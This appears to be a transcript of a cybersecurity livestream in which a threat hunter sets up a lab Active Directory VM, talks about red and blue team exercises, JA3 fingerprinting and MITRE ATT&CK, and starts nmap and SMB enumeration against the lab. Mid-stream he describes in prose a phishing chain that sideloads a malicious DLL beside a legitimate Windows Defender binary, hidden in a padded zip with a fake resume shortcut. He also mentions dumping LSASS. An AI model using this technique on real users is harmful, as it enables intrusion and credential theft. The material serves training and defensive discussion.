We started mad late. It's like 12. I'm 12 minutes late. Oof. But we about to start. I gotta set up. Thing is going off work today, so we good. We just gotta do that, and we gotta get a timer. We good. So I'm set up that. I think I have a gate on my microphone. If you ain't up on that, a gate is when if you don't meet a certain threshold of volume, your sound cuts out. Man, this shit crazy. I mean, stuff crazy. So copy that. Paste that in there. Okay. Tokyo Ice. Join, yoin, yoin, yoin. We be gripping everywhere. Yeah, yeah, yeah. Moved on. No, it was down. And then we're gonna do an hour. Yeah, damn, we'll be able to get started. So I do want some more light in this joint. Maybe. We'll see. So this ain't the best, by the way. Right. So we got another VM from I.T Security Labs. I think it's gonna be dope. So if I was trying to install security onion, bro. I'm such an idiot when it comes to stuff like this, man. Because I'll like start and then it just be too many questions. So I'll just be like, yo, good. I'm just gonna take a break. This is too boring. Installing security onion and stuff. So I didn't finish. As you see, it's funny, right? I don't get myself. I don't understand why I'm like that. But all I have to do now is download. I have it downloaded already. But yeah, I want to, in my Patreon group, we're starting a thing that I'm calling Unknown Artist, the Cyber Defense Division. And I'm just showing people my skills on the threat hunting side, which is what I actually do for a living. What is going on? Controller. I know I downloaded it yesterday. Let me see. Don't be nosy. Move that out of the way so you don't. Oh, it got removed. Why would it get removed? Oh, bro, I gotta wait again. You don't have the user rights to view this page. Man, come on, man. It's always something. Maybe he took the VM down. If so, that's not good. Because I have a whole morning planned. Let me see. Reddit, bro. I can't. Reddit wants to. Okay, I guess it's still there. So I can't get down with most social media sites, and this is why, yo. I mean, aside from the obvious, I'm not gonna talk about the obvious here. We all know the obvious reasons people should avoid or use social media sparingly. But I hate any type of media, period, that will throw a bunch of text at you. I hate that. Don't try to force me to read something. It's like if you use Windows and you go into the Microsoft news page, it's trying to force you to read a bunch of stuff, hoping that you'll click on something. And that's not good for your brain. That's not good for your day. It's good to start off with some peace, a blank page or a page with like maybe less than 50 words. Those words wear you down, especially if they're trying to make you react. But let me go ahead and Tokyo Ice. So threat hunting pays pretty. Yes and no. So threat hunting pays well if the managers, when you talk about well, the managers get paid well. I'm a mid-level manager, but I do a lot of threat hunting as well. And it's decent money, but the real equity comes when you can get some stock in the company. And I could get paid much more. I will tell you right now, my like people that know way less than me and they threat hunt, some get paid almost double. So, but when you have ownership in the company, to me, that's two things. One, it feels like you have a responsibility to take the company to the next level. So you're potentially immortalized there. And then secondly, you can move away from the company and still own a piece. So when especially a lot of people out there that aren't into cyber security yet, or this realm, whatever we're calling it, you'll see people take a high paying job somewhere and get options, get stocks, and get stock in the company, and then work there for like a year and move, do the same thing. And then when they retire, or when they do something else, they'll have all of this stock in cyber companies. And then they'll just wait for one to just, go into the atmosphere. And the thing is, because the company gave them stock, it's no risk to them. So it's only profit. So if the company tanks or whatever the case, they didn't lose anything. But if the company like blows up, they can go cash that in. I'm just now getting onto that. So there's that. Some people have been playing that game for years, man. But as far as actual threat hunting, and this is my opinion, so anybody want to challenge that, feel free. Threat hunters are far more valuable than penetration testers, and I'll tell you why. I believe that when you have to create, a lot of people can't actually do it. Some people can look around in data and find suspicious stuff, but to have a process and have to continue to work on that process and then be defeated when things that defeat your process come out, and then you have to recreate your process, that's a lot of work. And to be a good threat hunter, you have to know how to penetration test, and you have to know how to defend. Now, I'll give you an example. So while this thing loads up, so there's a thing called a JA3 hash. And a JA3 hash, if you don't know, JA3 hash or JA3S hash fingerprints a server with a hash. It looks like an MD5 hash. In fact, I think it is. So for a long time, what we were doing is saying, okay, if we get attacked by, I don't know, if we get hit by a C2, and it's using obviously a client and then several redirectors and then the team server, that final team server or whatever we're calling it in that chain, we can identify that by a JA3 hash. You couldn't get away from it for a long time. So every time we saw that JA3 hash, we'd know, hey, you've been attacked. Go ahead and start your remediation process. We'll start investigating, etc. Well, recently, and I'll show you what I mean. Recently, PowerShell Empire. Bro, PowerShell Empire, man. Sometimes penetration testing and ethical hacking is good, and sometimes it's not so good. Where is it? It's here somewhere because I didn't close it. Is it options? No, it's not here. Come on, yo. I just saw it. Anyway, what I'm about to show you is a module here. I think it's in listeners. Set listener. Uh-oh. What is it? Option? I think it's options. I don't know the new one. Bro, what's the deal here? Set options. Help. Okay. Oh, you gotta do the name. Options test. So if you look here, JA3 evasion. When I saw this, my soul melted. Because if it's in PowerShell Empire, then it's very likely that the guys that were hunting are doing it as well. So that is the struggle. The fact that when things come out, you have to find a new way to do them. And if you want to be a good threat hunter, you have to find out about these things very early. We're waiting. Whenever this, I lost some power there. But that's just one example of how you have a way to threat hunt, you have a way to catch stuff, and then things come out, right? Randomly generate a JA3S signature using TLS ciphers. Which, now that I read that, it should be pretty easy to do that. If you like are if you want to get into threat hunting, like super beginner, like don't know where to start, stuff like this. So what'll end up happening is for PowerShell Empire, when you attack or whatever the case, it attacks by URIs. And so these are kind of like the default. You want to get comfortable with stuff like that. Do we have Cobalt Strike? Not enough of us at work have Cobalt Strike. The penetration testers have Cobalt Strike. And the reason why I'm so hard on penetration testers is because of them. So the way that they use Cobalt Strike is, let me see. This is a good discussion, actually. I didn't even expect to get up and talk about this. Yeah, 68% complete. I don't know what happened to my original download, but the way that they use Cobalt Strike is they get everyone in a room. No. They split red team and blue team up, which we have blue teamers that just basically watch logs, by the way. They get red teamers and blue teamers in a room and they separate them and they say, okay, blue teamers, you're just arriving to a situation where something happened. You have an X amount of minutes to do a thing. Good luck. Go find bad, right? And so red team, blue team stuff happens. And then they finally meet up. And then the red team says, oh, yeah, we did this, and this. We're so bad. We're good. Like, these are penetration testers too, right? But they're red teamers / penetration testers, whatever we're calling them. We did this, and this. Oh, we're just so bad. We're just so smart. You guys aren't. It's like a competition, right? And then so blue teamers come back and say, all right, so how do you do it? What were we supposed to catch? Well, I don't know. I just logged into the tool and I did this, and this. It's like, I'm always telling them, as red teamers, you're supposed to be training. You're supposed to be letting them know what they should be catching. Don't try to hold your secrets because you're not helping the organization. There was one exercise in particular where they had a certain set of things to do. And one of the red teamers went off script and we cursed them out. Bad. Real bad, because if we want to emulate, we try to emulate certain threats that attack organizations. We don't just want to do something for the hell of it as red teamers, but they do. They're just cowboys. Seeing a lot of brute retail at the moment. I don't know if any of you guys know the story of brute retail and IPSEC and that whole thing. It's a little bit of drama. If you're interested, you can look it up on Twitter. But I'll just say this about brute retail. So, and I might be misquoting the story or whatever the case, but supposedly the guy that created brute retail was pretty hard on. He's pretty hard on anyone that. He's pretty hard on anyone that criticizes his product. Am I ready? I think I am. So he's pretty hard on anyone who criticizes his product. And IPSEC came to one of the guys' defense. It was like, take constructive criticism, don't be an a-hole, right? And you know how people act when people are defensive, like super defensive, and they don't think they're wrong, they take it way overboard. Let me see if I can pull up some of that stuff. And I'm not bringing this up to be a drama queen. I'm kind of bringing this up to say, when we as researchers are wrong, dead wrong, 100% wrong, eat our humble pie, because when we don't, we kind of destroy the community. Oh wow, this is a lot of. Yep, here it is. I'm not gonna go through all of it, but if you see anything about Paranoid Ninja, then that's kind of like the whole thing, and it's a lot. It's a whole lot, but IPSEC was, by correcting the guy, IPSEC risked, offending the guy. And that's kind of how we have to be sometimes. But, the dude responded and it became a whole thing. And it wasn't very professional at the end. Please tell me that this works. I don't know. Let's call it Challenge AD. And then IPSEC ended up doing a whole video about how he found out. So the guy changed his name and tried to do some stuff acting like he was a fanboy of Brute Retail. And then IPSEC found out that it was him with some, I don't know. There's just a lot. IPSEC had his phone number and then put his phone number in the Twitter and then found out that it was his account or something like that. And all because the guy couldn't take criticism. Moral of the story is definitely risk offending people if they're dead wrong, but I wouldn't play anybody's game. If they go beyond that, I wouldn't play their game. Anyone in here use Splunk or QRadar or what else is there? Kibana, Elk Stash, or whatever they're calling it now. Anyone use that? Because, I would tell you that those things, and I'm waiting right now, so if you need to come back, go ahead and come back. But those things are where I roam, I would say. Definitely where I roam. Tokyo Ice. Join. Kibana, yes. So data sets. Let's talk about like the data that might be in Kibana. And I'm giving everyone something free right now, but this video is available in my Patreon. And I don't mean to be like trying to sell people nothing, but I do want to keep the red team and the blue team stuff separate. So that's kind of why I'm doing that. Anyway, with Kibana, those are blue team tools. Red team's where it's at. Yeah. Maybe. I don't know. I guess it depends on your organization. The thing is, especially when you employ a red team, no matter what, the goal is to make this organization more secure. And at least for the penetration testers and the red teamers that I know, the majority of them don't think that way. The majority of them think that it's a big competition between them and blue team. I don't know why. But you have to. There was one particular one where I was blue team. And by this time, I was very good at pen testing and doing stuff at home. And this guy, how did he break in? He broke in with a malicious document like they always do. And he had the priv-esc on the box that he was on before he dumped the I think he dumped Kerberos. He made a golden ticket basically,
But before he did that, he had the Privesk. And so he went on the internet and downloaded a random exploit, didn't understand it, pulled it back to his box and ran the exploit, and nothing happened. But I asked him, I said, okay, well, you know, you were working with Windows, I think 7. And I asked him, how did he locally Privesk? And so when he was talking, it was clear that he was reading the GitHub. And I was like, do you understand the exploit? Do you understand what it took advantage of? He couldn't tell me that. And I had to like verbally tell him that's not cool, because now you can't educate the blue team at all. You're just a cowboy. You're like, oh, well, I'm just going to download this exploit. I'm going to be fine. If you red team, damn, this is taking a long time. I guess we can get started at 6. I don't know when this is going to download, but I'm going to keep talking until this downloads. When you are a red teamer, you lead, bro. It's like if you're a red teamer, I like to like put basketball in perspective, right? When you are a red teamer, your blue teamers are the players, and then the red teamers are the coaches. That's how it should be. You're the coaches. You are basically the staff. If you've ever watched basketball, the players are playing or whatever, trying to get layups. And then the coaches, not only are they tall and big, but they have these big, long things that they use to try to block the ball. So the players have to work extra hard to get over these props and things like that. And it's the same way with red teamers and blue teamers. It's like the red team already has an advantage by way of context. So is manage your software updates for anyone to get anything out of it, you have to say, okay, well, this is what we did, and then this is how you can defend it against it next time. If you can just do that minimum, if you can just do that bare minimum, you'll be better than 95% of red teamers. If you could do that on a consistent basis. But the only education necessary in that scenario is to manage your software updates. In that scenario, when I mentioned the guy that just like downloaded some kind of, I think it was a kernel exploit or something. In that scenario, yes. I was disappointed in him because he hadn't taken the necessary steps to understand what he ran. And there are several implications there. For one, it shows you how far he would go to win. It shows you that he takes no notes, so he can't. What we do when we run anything, when we run a command, we have to have it's strongly encouraged to have that in some kind of a file that has the command and the time run. He didn't do any of that. And I think most importantly, if we have a lab and you don't know what's going on in the code that you downloaded, and you introduce real malware there, wow. And I know we talked about that a few days ago. So there's several implications of not knowing what you ran. If he had simply run like something like, I don't know, Eternal Blue or some kind of well-known exploit, you know, it would have been seen differently. But you know, the fact that he Googled and instantly came across the first thing and ran it, it's ridiculous. Importing AD challenge. We've been looking at this for a long time now. Security onion. Yes, I agree. What I want to set up here, the machine currently has one network interface. Oh, okay. Yeah, here. I told you, like, I hate any kind of setup like this. What I try to do with anything with Security Onion or setting up Splunk is I want to set it up once I don't want to set up anymore. Add network dampener finish. You have to also bridge this one. Okay. I don't know how well that's gonna work. I got some red team, blue team stories, bro. I've never been a part of any professional ones where I felt like the red team was, what are you doing right now? I think over 15, I would say right now, over 15 red team, blue team exercises where I was the blue team. I've never been the red team, right? Yeah, I think that's correct. Never been the red team. Although I can do everything the red team does. And I'll tell you, that's what we look for at the end of the day. I can catch people all day. I can catch Cobalt Strike payloads. I can catch Empire Strike payloads. And that's not bragging. That's just because I've been on so many. I can decode your C2 and all of that stuff because it's meant to be decoded. It's not, the C2s aren't so fancy that you can't do that stuff. For the most part. I mean, there's ways to use certificates and hide, but people sort of use this stuff right out of the box, which you should. You shouldn't tinker around and make things exceptionally difficult, at least until the situation calls for that. There was one time, yo, there was one time, and I'm still waiting on this thing. I should have prepared. There's one time where we were on a engagement and stuff, and they used the Empire PowerShell Empire, and I'm just gonna cancel this because I don't want it pulling down my resources, which I should have enough. Once I found the IP, I started scanning the IP, and I was trying to break in to the. I was trying to break in, and they were like, "No, you're not supposed to do that. If we were on a real engagement, and if you're at a customer and you try to do that to a customer, and it'd be all bad." And I was like, "Yeah, that's me. Write me up, whatever." Does your red team follow the MITRE framework? When did we adopt the MITRE framework? 2020. Was that before COVID? So I have a very special place in my heart for the MITRE attack framework. It's my bread and butter. I speak like that when I'm at work. If I do, like if you look at my notes, I don't know what's going on there. If you look at my notes, you'll see that when I run anything on Hack the Box or do anything, I put the MITRE attack number there, category there, down to the numbers, because I want to sound smart when I'm talking at work, right? My red team follows the MITRE attack framework to an extent. When they do what they're supposed to do, they'll follow a chain of things. They can't really do much because everything is so everything is already scripted out as far as what they need to do. When they go off script is the bad thing, but yes. Long story short, they do. Yes. For a while we were using like we're a large organization, and so different different pieces of the organization were using different frameworks, and we had to put a stop to that, and we all went with the MITRE attack framework. Speaking of MITRE, they came to work one day, and one of the guys spoke with me, and I was telling him, what did I tell him? I was very passionate about something that I was telling him. I can't remember it. I'll probably think of it. but it seemed to me that he couldn't do it. Oh, I wanted him to give more context into connecting the categories, like what makes sense to run next. You don't have to do every single scenario, but you have to connect what makes sense with, if I fish a user with the mal document, what comes next that makes sense. Why is this taking so long? Oh, this is embarrassing. It did not take this long last night. Why, bro? Let's load up some Active Directory anyway, and then we'll come back to this. I want to give the user, the viewer, what they want. But yes, MITRE ATT&CK all the way. I try to make, for threat hunter, the threat hunting is, I already said it, but it's tough because there's a million ways to defeat defenses. There's a million ways to hide and things like that. There's a million ways to be fooled. That's the big thing. Like, you can definitely, we call, like, in my organization, we call it disinformation, where, which one do I want to do? Where hackers will come in and they'll just do things to make it seem like something happened so that you'll go in the wrong direction. And I see that often too. But you can't know that unless you have red team skills. You can't know that unless you have pen testing skills. But you do see disinformation all the time. But you have to report that disinformation because those are tactics. So even though you may say, well, even though they did all of this stuff, they didn't really do anything, you have to report that because you may see that again. So that's a thing too. I'd say if you're a red teamer out there and that's all you do, or if you're a penetration tester and that's all you do, my advice to you would be to have the most value is choose an actual threat to your organization. Don't choose just don't do random stuff. Choose an actual threat. So for example, if you work for Microsoft, I would choose Nobelium, which they're the SolarWinds guys. Choose them and build your strategy around what they do, and just obsess until you get the way that they attack. You should be just like them, and then you can run your red and blue team exercises, and then people can actually learn something. That's the way that you go from like getting paid like whatever to the stratosphere. And it might take work. It might take a lot of work, but that's where you want to be. Most definitely where you want to be. There's a bunch of persistent threats, and they're not easy to emulate, but that should be your goal. Let me see if I can close Security Onion, if that would make it faster. I've actually been enjoying VMware, but lately it's like, man, I'm expecting to start in about 8 minutes. This is really unexpected. I thought that I would be hacking by now. So yeah, I am off work because I thought I had COVID. I don't have COVID, and so I'm off until whatever I have goes away. I'm probably going back Thursday morning. So yeah. So I don't know if anybody's listening to my voice right now, but if you are, I've been trying to think of videos to do, but I don't want to do corny videos, right? I was working on a video that talked about how deep you should go into Windows, and then I found myself getting excessively bored with the video, so I canceled it. And I was like, nah. Look at that, man. None of my stuff comes. So it's almost done. We can get started. Can't wait. As far as blue teamers sometimes can be just as dead wrong as red teamers. And I'll tell you the weaknesses that blue teamers have. So sometimes blue teamers can ask too much from red teamers. Definitely ask too much. They can definitely be whiny and ungrateful. There was this one exercise that I was on where we were training with some college, like with the college, and these guys were up in, I guess they hadn't gotten into the field yet, so I think they were, what do you call them, pre-grad students? I don't know, bachelor's degree grad students. I don't know what you call them in America, but anyway, college students, right? Blue teamers, and then we had a red team or whatever the case. Checked the whole network. Couldn't find a thing. I even checked it. Couldn't find a thing. Nothing. The whole week. And it turns out that one of the computers or one of the workstations, one of the servers had a Docker container. The Docker container was compromised and it was beaconing out. And we talked about that, and it was some people that were really upset because, you map out a network and you say, okay, these are the things we have. But at the time, no one was thinking, oh, containerization. This Docker container has its own IP. Nobody was thinking like that. And yep. So I think in that scenario, red team did well because it is the job to be as stealthy as possible. Whatever the case, no one was expecting that, and I think when the red team makes it super impossible for a blue team to find anything, blue team may feel like they got ripped off or they timed it, whatever, but no one really gets ripped off. Like blue team sitting there Googling and stuff like that. So you're learning stuff. If you're just jumping in, we're still waiting for IT Security Labs VM to load up and we'll get started. So I think with this one, if I'm not mistaken, he put a secret message on the Vagrant's user's laptop. So if he did that, I guess my last live stream wasn't bad then. Like that's actually how it was set up. I think Vagrant is in play. If he left a message in this scenario on his desktop. So I think we're supposed to get to the Vagrant user's desktop and then we're supposed to decode the message on there. But I'm thinking if it's on his desktop, it's making it sound like Vagrant is a local user. And if he is, that's not very, I don't know. We'll see. I'm hoping that Vagrant is not a local user. He's a domain user. We'll see in about, 4 minutes. I don't know. And my camera died. If he dies, he dies. I should have just got a regular webcam. But yes, As you see, I have a bunch of opinions about stuff, but my opinions come from a place where I want things to improve and get better. Not necessarily that I want to see somebody not do well. We're all doing big things, I think. Red team, blue teamers, penetration testers, we're all doing big things, but it's super important not to get lazy. Don't get lazy. Don't get complacent. Don't think your job's going to be around forever just because you get, I don't know, 200,000 or whatever people are getting a year. I don't know what people's getting. I'll tell you right now, I'm not getting 200,000. But I know people that are the best job to have, in my opinion, in this game of cybersecurity is consultant. Consultant. You have to know your stuff, and you have to have a damn good resume. Hold on. You have to know your stuff and have a damn good resume. So you're not gonna just be like one of those guys that are asking, "Hey, how do I get into cybersecurity?" And then your first job, you're a consultant. That's not gonna happen. But guys that I know that are consultants have like 25 years, 20 years of not just cybersecurity, but they were IT on the back end. And like they land these spots like Mandiant, Microsoft, Google, Lockheed Martin, some of the government stuff. Like they land these big jobs, and they're good. They're pretty much working from home. They're traveling whenever they need to talk. They're speaking at large like places. They give money, man. And yeah. So it's a thing. Me, I got like 5 years in cybersecurity, in pen testing and ethical hacking and threat hunting. So I would say in another 10 years, I'll be ready to do my thing, man. Maybe 10 years, maybe 5 years. We'll see. I did get an offer, man, I got an offer from Kaiser Permanente. The offer was $170,000. 107. I'm putting out personal information, by the way. So I mean, it's good, bro. I trust y'all, but $170,000. But sometimes the what I want to say here, what the job description is not what you'd want it to be. There was one job offer that I got where it was like I would be red teaming, but it'd be in the department that handles space for like works with SpaceX. It wouldn't be working at SpaceX, but they were working with SpaceX, and you'd be red teaming in an environment where space stuff is going on. I have? Oh man, I appreciate that. I think what it is, man, and I'm gonna get to your question, Jay Hacksaw, in a minute. I think what it is like, I think people need someone to like just, just give you the raw, bro. So we're almost ready though. But yeah, Maximus, I appreciate that. So Jay Hacksaw, I love to see videos about law bins. I'm thinking, is law balls a thing? I don't know. I'm not as smart as living off the land, binary scripts and libraries, and EDR evasion. I'm going to speak my opinions on law bins or law bars, if that's what we're calling it now. Just live off the land stuff. I would say that I don't know why we call it live off the land anymore, because that is the go-to way that we should do things if we're pen testing, if we're doing anything and hacking, doing anything with red team, that's the go-to thing. So the foreign thing, the thing that we shouldn't be doing is using our own tools to enumerate. Like we shouldn't, if we can't avoid it, we shouldn't introduce Mimi cats to the machine. Like that should be the last resort if we want to, dump creds or whatever the case. Like for advanced people, right? If you're advanced, you should find a manual way to dump LSAS. You should find a manual way or live off the land way to enumerate the network. So instead of, I don't know, that's my opinion. I don't know why we gave it a fancy name when that is the first thing that we should be doing. But yes. So that said, I would tell you that the attacks that I see these days, stuff that's already in Windows, you just take advantage of it. One in particular, I did a video on how you could phish a user and you can hide all of the stuff. So what you do is you put the binary for Windows Defender. You put that in a zip file, and then you put a malicious DLL. I think it's MP something, but that DLL goes with the Windows Defender binary. You hide both of those. You have to put some filler into the zip file as well to make it over 500 megabytes. And then you put a link file that's supposed to be a resume or some document, but in reality, it's just a shortcut to the legitimate Windows Defender binary. You put all of that in a zip file. You send it to a user. The user clicks the Windows Defender binary because it is a Windows Defender binary. It runs, period. It's going to run. But that malicious DLL is going to get loaded up with that because these binaries, the first thing that they do is check the present working directory for DLLs. So you have your DLL sideloading. Live off the land, bro. You introduced you did Trojanize a DLL there, but the DLL has to work to a certain point. So 99% of the code is legitimate. It's just you got your one little thing in there. So yeah. Long story short, yeah. I could do just my whole thing on that. That'd actually be a pretty fun video. And then EDR evasion. So many opinions on this one. You have McAfee McAfee is what I'm most familiar with. McAfee is what I'm most familiar with on a large scale level. And you have your other EDRs as well. We use a bunch of different ones. I don't want to get into specifics there. We use a bunch of different ones at once. I'll tell you that. And they don't always play well together. So yeah, that's a thing. If you put two or more on one workstation or server, they'll fight. One will think the other one is dumping credentials. The other one would think one is ransomware. Yes, we're finally there. And that's the biggest heartache there. I know I haven't spoken on evasion yet. I think evasion... Tell me it imported at least. Oh. Evasion, I think that's going to be specific to what you have. I'll tell you, whatever Windows Defender doesn't catch, another EDR will. So everybody out there is saying that, oh, Windows Defender is this and this. Okay, keep playing. Keep playing. Keep sleeping. Because I think the best detection is, what is this? Save machine. The best detection is when you don't know you're detected. If you keep going as an attacker and not know that we're watching you, yeah, All right, I'm gonna just which service to get attacked more often and what to look for. So if we're talking specifically about Windows, like Active Directory, I'm thinking that's probably most relevant here. The services that get attacked more often. Man, this is the first time it's acted up at all. The services that get attacked more often is just obviously depends on your situation. For us, I would say that post exploitation. I don't know if I actually should share that. I'll just give you a list of things that are of concern. Because so Cali's good. I know that Hack the Box is Hack the Box, right? And I know that bypass VM. Bypass VM. Okay, so here's the disk. We're good now. All I have to do is open. It's not in there. No, I don't have to import it anymore. It should be imported, right? Edit, view, customize library. There it is. Power on. We're good. Yes. In the real world scenario, so real world versus like what you see on Hack the Box, obviously different. Um, in real world, I'll tell you right now, RPC encrypted, bro. SMB is going to require two-factor authentication. What else? And I think those are huge. WinRM, two-factor. So you're talking about a certificate-based authentication, right? Or if you want to look up ADCS, Active Directory Certificate Services, that's what you're dealing with. So it's not, oh, I got a password and get in the SMB, dump SMB. Nope. So yes, understanding that, you got to be a lot more creative if you're really going to do something. That's one thing. What is my IP here? Once I get the IP, we can get started. So that's one thing, though. How do we normally get the IP? Do I just scan my network? What is it? LAN segments, advanced. There's like a network something, right? There's an edit. Yeah, here it is. And then on top of that, organizations are using like cloud and stuff. So why would I go through the trouble of? I did it once, but I can't remember what I did. Am I supposed to just configure it myself? Because I could do that. All right, how did I do this last time? Ah, challenge AD. Do I just do a ping sweep? Hmm. I don't remember what I did. Let's do a Wireshark or something. Um, I'm just gonna look for a new IP, which there's nothing going on, so that's probably pointless. How do you get?
maybe vagrant. Let's try that. Do I know the network mask? Let me see. It looked like it was in there. Yeah, 75-0. So show you some sick PowerShell skills, bro. So I think you guys can see that. I don't know if you guys can see that. Is that how he suggests people find it? 1 to 255 each ping. 1, 2, 1, 6, 8, 1. What do we have? Nope. 75. Got this thingy. Ooh, it's gonna take a while. It's gonna take a while, bro. What is it? It's not C, it's N. That's gonna take a while. You know what I could do instead of that? I could do a netcat sweep. It's probably quicker. Let's see if it's the password is vagrant. Oh, he changed it. Okay, so it looks like the last time we got in, that was actually the correct way because it is definitely changed. Sign into WinDomain. Let's see. What I could do is just go ahead and put it on my network, but I don't know which. I guess it doesn't really matter. Change settings. That ping sweep is gonna take a while. So at 17, it has 255. So, and I'm not even sure if it. Oh, tripping, bro. Man, I'm tripping. Okay, my bad, bro. I'm supposed to do that from Cali. Trying to be a show off, bro. All right. Exit. Yes, I want to exit. I don't care. Ping 192.168.1. No, 75. Because the virtual network says can't you put it in its own? You can put it in its own virtual box. Why would you have that? Yes. This is probably better. And then you can put this in the same network and we should be starting. And my ping sweep might be fast. You might be right. But let's go ahead and put both in its own network. Host only. Host only. What is this? Host only. Tokyo Diamonds. Hush. Hush. Tokyo Diamonds. We be ripping every way. Host only. So I'm gonna do host only there, but then I'm gonna have to assign my Cali. Okay, my bad. That's not gonna work apparently. Let's see if we can get. I want to do that one. Let's try that one again. So I'm thinking when I assign the IP, there should be some kind of DHCP traffic that immediately happens, and then I should be able to know, hey, these are the IPs. How do I filter on IP? Is it? All right, stop. IP proto equals DHCP. I can't do that. We're going through a lot to get a little here. Look it up on the internet. Say Wireshark filter DHCP UDP port 68. Dang, it's been a while. All right, so when we assign these to my network, we should get DHCP packets. Should we not? Am I listening? Oh, I'm not even listening. Dang. Let's go back to host only. Host only. Okay. And then this is probably it's probably a better way to do this. Bro, listen, bro. I want you to listen. Okay, you acting stupid. All right, Wireshark, you must die. End task. This is ridiculous. Does anyone know if he has like directions on how you do this in a better a better way? Let me see. This and then stop. And then UDP port equals 68. All right, so we should be good there. Now we could do bridged and then okay, and then we should get. Okay, it wasn't listening again. I don't understand that. All right, one more time, one more for the road. Okay, finally get started. Where are we at? 67 minutes. Bridged. Bridged. Okay. So we should get UDP now. There we go. What is saying in here? Does it give me the actual IP that it gave out? Should it not? Oh, it's probably an offer. Your client IP address is 70. Gave it 70 for that one. I got two 70s, so maybe that's not the right one. Let's try to ping 70. Let's go back to what you mean, bro? Settings. It's bridged. Network is unreachable. I don't know if that works. Let's see.
Okay. Mm, bridge. Bridge. I don't know. Net. I don't care. Okay. Let's see about netting this. It's just not set up correctly yet. Let's try this. Wow. I definitely screwed something up. Let's see if I can ping from my place. Ping 192, let's just say 170. That's a 64. So that's not Windows. I don't know what requested an IP. Sure as hell wasn't this. Let's try this one. And then let's go here. And let's say change settings. Yes. Bridged to you. Apply. See what happens. I think it's a subnet. Let's restore defaults. Yeah, because I don't even have. Yeah, that's gonna have to be it. Apply. Oh, Plizza. Okay. Can anyone see like something I'm doing glaringly wrong here? I don't think I'm doing anything wrong, but I might be. It just might just be super early. I believe I can fizz. Eh. Preferences. No, not preferences. Virtual network editor. Okay, so it has a 75.0. So we could do mmap. What's the ping sweep scan? I think it's like I want to get. I don't know. It might be a better way to do this. I do know that port 3389 is open on this thing, so it's gonna ping sweep. First of all, let's see if we're on the network. We still aren't. We still have not gotten an IP yet. So I'm gonna go ahead and restart this Kali. Maybe it's the Kali, and that's for you. Why did I just keep it regular? You know what I could do though? I don't know. This should work, bro. Connect the host virtual adapter to this network.
Kind of stuck here. I don't know what I did last time. I did something that made it work. Like 40, don't save her. Wow. You never know what's going to happen when you wake up and you just get on live stream. All right, bridged. Bluetooth. I don't know how it changed it at. But it changed it back to my Ethernet card. It doesn't have a subnet address for some reason. Can't do anything else. Restore defaults. Apply. Okay. And then this. What's going on here? I think I froze up. Oh, no, I didn't. This thing's just sitting here. We don't know the IP address. County. Boy. And power them all off. We'll try again. Yep, normally I'd be off of the live stream by now. That's crazy. Or I'm getting off. I haven't even started today. So if people are coming in like right about now, just wait longer. Oh, man. Now let's make sure we get this right this time. All right. Change settings. I don't even understand why we're even here. If we can just bridge. Because my Kali isn't even. We don't want to be on that network. We want to just go ahead and bridge it to the physical network, which is fine. Don't care. It's not responding. Big up to all my haters. Stop and quit without saving. Yeah, I promise y'all a show, and I'm gonna give y'all a show, man. I think it has a lot to do with me streaming. Wireshark won't die. Close. Cancel. So this is Kali. So I want my Kali to be bridged like it was. Okay. Power on. If anything, we gotta have a Kali. I don't care about anything else. I don't know. I was talking about what services get attacked the most. If I were to name one service that I'd be concerned with, it's not really a service, but I guess it's a feature, and it'd be how you do your multi-factor authentication. That's where you want to get.
And so if you can fool anybody into getting into the network, no matter how you got to do it, that's what you want to aim for. Whatever the certificate services is on there, like active directory certificate services, that's number one. That may not be like a service or like S&B or whatever people might want to hear, but that's real. You don't want to. If you really want to get in, you don't want to make yourself loud and obvious by like trying to brute force into S&B or WinRM. My Cali's dead. I'm going to use my other Cali in VirtualBox, which I am not happy about. I have to fix that later. Don't want to fix that on live stream. And I have to figure out what IP. You know what I could do though? I could check if it's actually bridged. If it actually bridged properly, I could just check my router information, because as things connect themselves, it should say, hey, a new device popped up on your network or whatever. So I'll check that, and then I can just get the IP from there. It's probably not intended. Let's try this one more time. Bro, what the? So my Kali just won't load up anymore, and I did not. It's crazy because I didn't get a snapshot. So all that for nothing. Let me see. Recently joined DC. And the IP address is 82. Got it. So let's ping 82. Yes, there it is. Ooh, I was about to go crazy, man. And so what we could do is we're just going to use the VirtualBox version for now and then hack into it that way. So finally ready to start. So I wish I could do something to show, to alert people that is on now. I did it in the most ass backwards way. I don't know if I can say ass backwards on the live stream. Algorithm, bro. YouTube. Loading initial RAM disk. What does that mean? To me. Y'all probably like, what's going on, bro? What's up with this setup? Like, I got both Calis from different programs trying to run, and then nothing's coming up. Reset. All right. We're on the grub. Are you kidding? I just got the IP. All right, I could just, for this one, I don't care about reverting to a screenshot. So let's just revert to a screenshot here. Screenshot, snapshot. Shut down. Yeah, shut down, please. Thank you. It says CPU stuck for 26 seconds. System, whatever. I don't know. Okay, so the other one's loading up. So we can say thank you to our virtual box. And then, yes. So the only question now is, did they assign me an IP here? It is bridged. And we can get started. Finally, bro. Where we at? 85 minutes. So I'm going to do like a time marker thingy in YouTube. So if you have to come back to the video, you can, as soon as I ping it, I'm going to start a timer. So, well, as soon as I get a ping back or ICMP response. What was it, 82? I think it was 82. Yes, thank you. Just thank you. Yo, I appreciate that so much. All right, we're going to start. All right. Interact. Let's go. All right. So first thing that I'm going to do is I'm just going to do an nmap. 3, 2, 1, 6, 8, 1, 82. I'll tell you that this nmap is mad unnecessary because I know it's a domain controller. So I'm going to just start doing hood rat stuff. So let's go into a terminal. Say file, new, and then I'm gonna just say commander. What do I have in commander? Oh, are you serious? What's up with that? Oh, that's because I didn't. What? Oh, man. I didn't think I would have to do that here. T auto dev SDB home Cali work, and then I have to sudo. So if you don't know, I have it didn't work that time. Okay, there are all my stuff. Oh, it's in work. That's gonna be a problem. So I'm gonna have to burn some of my time figuring this out. Move work 2 and move work 2 here. Are you serious? I also have to chmod. What is move tag R? Oh, it's already moved or something? It said access denied or some of that stuff. Move work 2/star here. Yes. And then let's just make sure nothing else is in work 2. There's not, so move R work 2. Bro, leave me alone. Sudo. All right. Burn 4 minutes doing that. Now I should be able to run commander. Man, this shouldn't. All right. So we have Bloodhound, IAX, DNS, enum, RPC, LDAP, SMB. Let's try SMB commands. be 192.168.182. And then Noom for Linux will be first. Oh, it seems down because I didn't. Beautiful. So access denied here, so I can't get in this way. It's fine. Let's go back. Not you. I still like to do SMB client myself. Even though I should have gotten everything that I would need from that command. Still like to manually do it because what? Don't do that. Let's make sure we're listening out for the alarm. SMB client. L. Just want to see if it'll list things anonymously. By the way, anonymous logon, that's not like a gameism. Like many organizations have to resort to anonymous logon. So it's all about making sure that 